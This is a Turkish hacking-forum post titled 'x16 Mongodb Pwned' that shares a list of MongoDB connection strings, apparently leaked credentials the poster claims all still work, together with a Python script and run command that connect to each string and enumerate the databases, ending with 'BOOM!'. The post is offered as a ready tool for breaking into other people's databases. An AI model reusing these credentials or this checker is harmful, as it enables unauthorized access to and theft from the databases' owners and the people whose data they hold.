x16 Mongodb Pwned

freebsd

Üye
24 Nis 2020
137
62
Merhaba, biliyorsunuz ki daha önce mysql üzerinde sızdırılmış veritabanı bilgilerini kullanarak bir hacking işlemi gerçekleştirmiştik, otomatik bir mysql checker ile.

ESKİ KONU LİNK'İ => 14 Database Leaked
Şimdi ise aynı şekilde mongodb veritabanı bilgilerini paylaşacağım, güncel olarak hepsi çalışıyor.

Kod:
mongodb+srv://cooluser:[email protected]/
mongodb+srv://User:[email protected]/
mongodb+srv://readonly:[email protected]/
mongodb+srv://ajibadee:[email protected]/
mongodb+srv://admin:[email protected]/
mongodb+srv://admin:[email protected]/
mongodb+srv://johnDoe:[email protected]/
mongodb+srv://Jazzy49:[email protected]/
mongodb+srv://Arch:[email protected]/
mongodb+srv://sam:[email protected]/
mongodb+srv://teaditusr:[email protected]/
mongodb+srv://earvacheh:[email protected]/
mongodb+srv://kalkinesubs:[email protected]/
mongodb+srv://cluster0.ttljyyp.mongodb.net/
mongodb+srv://testatjctechdevdotcom:[email protected]/
mongodb+srv://admin:[email protected]/



Python:
import argparse
from pymongo import MongoClient
from pymongo.errors import OperationFailure

# Argümanları ayrıştır
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--list", help="List of connection strings", required=True)
args = parser.parse_args()

# Veritabanı bağlantı bilgilerini dosyadan oku
with open(args.list, 'r') as file:
    connections = file.readlines()

# Her bir bağlantı bilgisi için
for conn in connections:
    conn = conn.strip()  # Satır sonu karakterlerini temizle

    try:
        # Bağlantıyı oluştur
        client = MongoClient(conn)

        # Tüm veritabanlarının listesini al
        db_list = client.list_database_names()

        # Veritabanlarını yazdır
        print(f"Connection: {conn}")
        for db in db_list:
            print(db)
        print("\n")
    except OperationFailure as e:
        print(f"Failed")
    except Exception as e:
        print(f"Failed")

Bash:
python3 untitled.py -l list.txt

BOOM!

, Best Regards
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.